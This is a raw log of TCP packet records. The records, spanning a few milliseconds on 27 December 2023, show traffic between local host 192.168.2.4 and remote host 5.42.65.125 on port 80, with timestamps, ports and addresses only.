Dec 27, 2023 17:57:26.120697021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120707035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.120709896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120728016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.120737076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120749950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120762110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.120764971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120779991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120785952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.120795012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.120822906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.121262074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.121306896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.121324062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.121392965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.121408939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.121422052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.121434927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.121442080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.121470928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.121504068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.121536016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.121537924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.121555090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.121707916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.121722937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.121735096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.121746063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.121750116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.121764898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.121772051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.121779919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.121793032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.121795893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.121813059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.121817112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.121830940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.121845007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.121846914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.121861935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.121882915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.122251034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.122323036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.122325897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.122404099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.122420073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.122432947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.122450113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.122458935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.122464895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.122479916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.122484922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.122494936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.122505903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.122509003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.122535944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.122701883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.122740984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.122807980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.122824907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.122838020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.122852087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.122864962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.122873068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.122879982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.122898102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.122910023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.122920036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.122925043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.122940063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.122955084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.122965097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.122970104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.122986078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.122991085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.123001099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.123016119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.123029947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.123029947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.123044968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.123053074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.123064995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.123079062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.123080015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.123095036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.123114109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.123786926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.123800993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.123814106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.123830080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.123836994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.123843908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.123857975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.123861074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.123872995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.123878956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.123888016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.123902082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.123903036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.123917103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.123929977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.123944998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.123946905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.123965025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.123975992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.123990059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.124002934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.124015093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.124023914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.124030113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.124042988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.124049902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.124058962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.124072075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.124077082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.124093056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.124619007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.124633074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.124667883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.124680042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.124696016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.124712944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.124726057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.124737978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.124752045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.124758005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.124768019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.124783039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.124788046 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.124835968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.124874115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.125128984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.125144958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.125169039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.125202894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.125219107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.125236988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.125241041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.125251055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.125263929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.125268936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.125298977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.125308990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.125324965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.125341892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.125356913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.125370979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.125375986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.125402927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.125431061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.125446081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.125458956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.125467062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.125473976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.125488997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.125493050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.125504017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.125518084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.125530958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.125534058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.125554085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.126049042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.126064062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.126091003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.126120090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.126162052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.126216888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.126230955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.126244068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.126259089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.126275063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.126275063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.126290083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.126297951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.126307011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.126323938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.126327991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.126338959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.126353025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.126353979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.126368999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.126383066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.126391888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.126399040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.126411915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.126416922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.126427889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.126441956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.126445055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.126456022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.126498938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.127028942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127043962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127057076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127070904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127084017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127084017 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.127101898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.127126932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127126932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.127141953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127155066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127170086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127182961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.127183914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127218008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.127489090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127502918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127516985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127531052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127545118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.127563000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.127578020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127593040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127605915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127620935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127629995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.127661943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.127759933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127774954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127787113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127799988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127806902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.127813101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127823114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.127830982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127845049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127846003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.127861023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127873898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127887011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127890110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.127902031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127914906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.127916098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.127943039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.128509998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.128523111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.128552914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.128644943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.128659010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.128673077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.128684044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.128688097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.128698111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.128712893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.128716946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.128734112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.128736973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.128751993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.128765106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.128782988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.128788948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.128797054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.128812075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.128813982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.128829956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.128838062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.128843069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.128859043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.128868103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.128871918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.128885984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.128901005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.128906012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.128932953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.129386902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.129404068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.129415989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.129430056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.129448891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.129455090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.129491091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.129504919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.129518032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.129529953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.129534006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.129549026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.129556894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.129564047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.129582882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.129892111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.129906893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.129920006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.129930019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.129934072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.129949093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.129959106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.129965067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.129978895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.129997969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.130027056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.130039930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.130055904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.130073071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.130085945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.130088091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.130099058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.130115032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.130129099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.130131006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.130142927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.130156040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.130157948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.130173922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.130187035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.130189896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.130203962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.130213022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.130219936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.130244970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.130830050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.130844116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.130855083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.130868912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.130887032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.130889893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.130902052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.130912066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.130925894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.130938053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.130939960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.130966902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.131082058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.131095886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.131108999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.131123066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.131134033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.131134987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.131149054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.131161928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.131164074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.131176949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.131181002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.131191969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.131205082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.131210089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.131220102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.131236076 CET	80	49738	5.42.65.125	192.168.2.4
